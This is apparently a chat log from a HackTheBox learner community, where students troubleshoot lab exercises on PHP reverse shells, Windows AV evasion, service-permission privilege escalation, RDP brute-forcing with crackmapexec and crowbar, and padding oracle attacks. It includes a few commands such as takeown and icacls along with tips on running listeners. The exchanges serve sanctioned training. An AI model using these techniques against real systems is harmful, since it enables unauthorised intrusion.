what's the listener command and output

the payload works

Since I can confirm that this in-fact works you can delete this

When you execute this, does the webpage keep loading or does it finish loading?

@rustic sage are you running your listener before or after you visit the theme page?

Yeah it could be an issue with the Listner setup if the webpage keeps rendering but no reverse shell is made

I run the listener, then refresh the page. Nothing happens.

what page are you refreshing?

Does the page finish refreshing

the http://ip/path/to/theme.php?

The theme page itself.

The admin one.

Does the loading thing keep spinning

Or does it load successfully

that's not the theme page

that's why you're not getting a callback

you're just refreshing the editor

Bruh.

oh my goodness

when you click the theme tab it will tell you where the page is located that you need to load

was that not shown in the module

this is more of a user error than a not being taught error

true

It’s fine, I’ll accept the fact that I am slow.

but the editor itself is not running the php code

but with this newfound knowledge you'll be able to get your callback :)

also as a general suggestion when using the pwnbox

use -s [tun0_ip] to have it only listen on the tun0 port

as the other interface is public facing; and you might get false hits from scrapers

This was the biggest bruh moment ever.

I spent like 4 hours on this box. And half of that was just me being stupid.

https://tenor.com/view/it-be-like-that-sometimes-like-that-sometimes-snoop-dogg-sometimes-just-like-it-gif-12501830

i've been there

tfw the instructions say "authenticate" and you do every other method but

Generally when you execute a reverse shell in a webpage, if it did execute properly, the page should keep loading indefinitely. If it doesn't, then the payload didn't get executed. So if it does load successfully, you know you're doing something wrong with the payload execution 🙂

I think you missed the plot

I've not done this module so probably 😂

he was loading the /admin/themes.php page, not the /theme/<themename>/template.php

Just curious, what's the place that's vulnerable for injection on this particular exercise?

not spoiling

it's part of the getting started module

you'll have to discover that for yourself

i've already said more than enough

Alr

I'm going to have to go through this again tomorrow. Brain is soup. Thanks for the help though.

https://tenor.com/view/good-soup-good-soup-meme-meme-adam-driver-gif-22924425

https://tenor.com/view/idiot-elmo-im-stupid-shrug-im-an-idiot-gif-16140879

Brain fog. I am in that state constantly too

as long as you pace yourself and recognize when you might need a break, you'll be fine

my general rule of thumb is if i'm starting to get unreasonably frustrated at myself over small mistakes

I'm taking a very brazen trial by fire approach, so I'm learning all of the commands, syntax, etc. on top of the methodology. If it's not one issue, it's another, lol. At least for now. This was only my second box.

I would like to ask if you can turn on the target machine?

Yes you can

What are you trying to turn on?

It says it's spawning you have to wait

I waited very long and cleared the cookie as well, and this target machine still doesn't turn on

Close the browser and go to it again and try to re spawn it. If that doesn't work, and it never spawns, contact support

Change vpn region

and try respawning then

Thanks, your approach is very effective

Hi. I need a little bit of help in the module Using Web Proxies - ZAP Scanner.
How much time does it takes ZAP to start searching for vulnerabilities? Is not starting for me. it has been 15 minutes without starting to scan de website.

Is the website in your /etc/hosts?

Did you specify the port?

The scan itself can take upwards of 30 minutes or more

I add it the IP at the bottom:
127.0.0.1 localhost
127.0.1.1 debian12-parrot

The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-zmp5gtt1ja htb-zmp5gtt1ja.htb-cloud.com
94.237.59.199:35862

Is it ok like to add it this way?

That's completely incorrect

Huh

You don't include the port in your /etc/hosts, you also didn't put the domain

You specify the port in the connection string http://domain:port

Whats the, "htb-zmp5..." Line?

Pwnbox

Oh

94.237.59.199 a.root-servers.net nstld.verisign-grs.com
Ok thanks i fixed it this way

That's not correct either

It should be 94.237.59.199 <Domain>

Did you not get given a vhost for this section?

That's what you put next to the IP

If not then you don't need an /etc/hosts entry

You just put the http://ip:port in the zap scanner using the spider option

screenshots would help

This wouldn't fix it btw, since you don't have/need a vhost for this

The hosts file is a local DNS

@trail sail btw: whenever you're given a public_ip:port, the only scope is that port and any vhosts you may discover if needed

The info you put there is just the info brought up via public name servers which are irrelevant to that ip

Ok, I don't understand anything right now. I'll call it a day and continue with this module tomorrow. Thank you, everyone. Have a good one.

My point; you can delete that entry and it would work just fine

Thanks!

SQLmap is an amazing tool

Start with information Security foundation path

That will get you familiar with a lot of the basics

If you wanna do the cpts you'll need to do the pentester path, the information Security Foundations path is a pre-requisite to that

Htb is not free

There is the student plan which is $8/month and gives you access to the whole course

But it is well worth it

youtube is free. and i believe PortSwigger academy is free. but HTB is incredibly cheap, especially for what it is.

You just need to be an active student in Uni

i still recommend HTB if you can.

The tier 0 modules are free

As in they refund the cubes you pay for them fully

All other module tiers give back 20%

Anyone doing Windows Evasion and found that the binary is not being executed ?

.

alsonotmalware.exe

fret not, it is also not malware

I've completed it, the module won't steer you wrong

Anyone completed this below :
Module: Information Gathering - Web Edition
Section: Skill Assessment
Question: "After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb."
I am stuck some can give me a hint please.

The payload works on my local machine, do I have to spawn calc.exe as it kills itself after spawning win32calc.exe ?

I'm currently spawning notepad.exe instead

On phone, give me a moment to spin up my notes

How can I upload photo on this group?

read #welcome

This channel

Read #welcome so you can get instructions and eventually you can upload photos

INTRODUCTION TO DIGITAL FORENSICS
Evidence Acquisition Techniques & Tools
Visit the URL "https://127.0.0.1:8889/app/index.html#/search/all" and log in using the credentials: admin/password. After logging in, click on the circular symbol adjacent to "Client ID". Subsequently, select the displayed "Client ID" and click on "Collected". Initiate a new collection and gather artifacts labeled as "Windows.KapeFiles.Targets" using the _SANS_Triage configuration. Lastly, examine the collected artifacts and enter the name of the scheduled task that begins with 'A' and concludes with 'g' as your answer.

i did as described, downloaded the artifcats but cant find a process which start with A and ends with G.
Could somebody please give a hint?

I tried spawning calc.exe instead and it worked on my local machine but not on the target machine

Are you using CreateProcess

yes

did you read this bud
#modules message

oh sorry I just read it, and yea the problem was that apparently the project is compiling in 32bit which causes it to spawn a notepad.exe in 32bit (for some reason)

and after I changed the compile configuration to 64bit, then it spawns notepad.exe in 64bit

did you update your code to use C:\\Windows\\System32\\calc.exe ?

yes, and it worked on my local machine (spawn calc.exe and got reverse shell)

thats why I was suspecting that the module target box just isn't triggering the binary, but gubarz said he has completed the module so Idk

go me, i dont know what i did with my original code, but rebuilding the solution its not triggering for me from alpha

maybe the current version of the target box is messed up for "ProcessInjection" part ???

my original exe that is known working isn't updating the log either

Unless they changed it in the last 24 hours

As he said he just tested it yesterday

who is he?

Xreous

The one that confirmed it should work

he said it before that he hasn't done the module

He could have done that section but not finished the module

He said that he tested the payload and it worked with minimal modifications

but if you're sure the lab is broken #1234357888114364508 exists ¯_(ツ)_/¯

yea the log seems to be stuck on 5th July

about padding oracle attack in https/tls module, i tried all possible block sizes and the recovered plaintext is gibbrish

yeah seems like the checking task is broken

just posted an issue in erratum so let's hope someone will get it fixed ASAP

gonna skip that section for now

any idea what encryption is this

i usually try ascii and/or base64

need help with this

I just tested all the other payloads for the other sections and they are all working except for that one :/

oh bruh nvm i made a typo and gave wrong error argument

That’s not allowed but ok

@languid fjord <----

Wow that complete domain compromise on AD Skills Assessment 2 was a whirlwind and incredibly fun!

Happy to be done with that

I would like to speak to someone for the following module:
Name: INTRODUCTION TO WINDOWS EVASION TECHNIQUES
Section: Skills Assessment #2
thank you

Just ask your question

Well I am able to create a reverse shell with my poc.vbs in the dev machine and also on the victim machine. However when the vbs is triggered by the bot it is not creating the reverse shell. When I look into the log.txt, I can see a timeout which might suggest an issue with the bot.

Do I need to raise a ticket?

Hi, I'm currently doing the "Weak Permissions" section under the Windows Privilege Escalation module. I modified the bin path of the vulnerable Windscribe service and was able to add myself to the Administrators group. And yet, I cannot read the flag on the Administrators desktop (shows Access Denied). I tried the commands takeown /f C:\Users\Administrator\WeakPerms\flag.txt and icacls C:\Users\Administrator\WeakPerms\flag.txt /grant htb-student:F to no avail. Any help?

Did you update gpo then log out and back in

GPO? Not sure what that is sorry

By that I mean literally using the start menu and logging out then in again

Ah ok let me try that

@fathom pendant any chance you can help me out on that one?

Haven't done this module so I can't

Nope, doesn't help

I solved both of those a different way, may not be convenient or the intended as far as the module goes, but there are other ways to get the flags that don't require popping a shell.

Did you sign out or just close the rdp

Did you also run powershell as admin after logging back in?

Oop I didn't sign out

just disconnected from the RDP session

thanks mate, can I DM you?

I did try this though

sure

Yeah you need to sign out then back in for it to take effect

Not just end session

Ok yep working alright now

Thank you marcielee

It's just how permissions in general work, because the user is currently active windows can't actively assign it a new group

It's queued up

Makes sense

INTRODUCTION TO DIGITAL FORENSICS
Evidence Acquisition Techniques & Tools
Visit the URL "https://127.0.0.1:8889/app/index.html#/search/all" and log in using the credentials: admin/password. After logging in, click on the circular symbol adjacent to "Client ID". Subsequently, select the displayed "Client ID" and click on "Collected". Initiate a new collection and gather artifacts labeled as "Windows.KapeFiles.Targets" using the _SANS_Triage configuration. Lastly, examine the collected artifacts and enter the name of the scheduled task that begins with 'A' and concludes with 'g' as your answer.

i did as described, downloaded the artifcats but cant find a process which start with A and ends with G.
Could somebody please give a hint?

What is the best way to report grammar corrections? About 50% of pages have subtle ESL errors.

Is it normal that bruteforcing RDP credentials with crackpmapexec is extremely slow? Its like 20 seconds per try, while i get around 10 per second with SMB or SSH

in #1234357888114364508

from what i remember, yes. i can't remember if you can adjust thread's for faster attempts?

crowbar goes fast

is that a tool

but given the nature of the service, i doubt rdp would expect a lot of connections .... i remember using smb being the quickest

alright thanks

https://github.com/galkan/crowbar

thanks

How do i install crackmapexec on Parrot OS, nothing is working ive tried sudo apt-get -y install crackmapexec, pipx install, python3, installing the github repo with recursive didnt even work either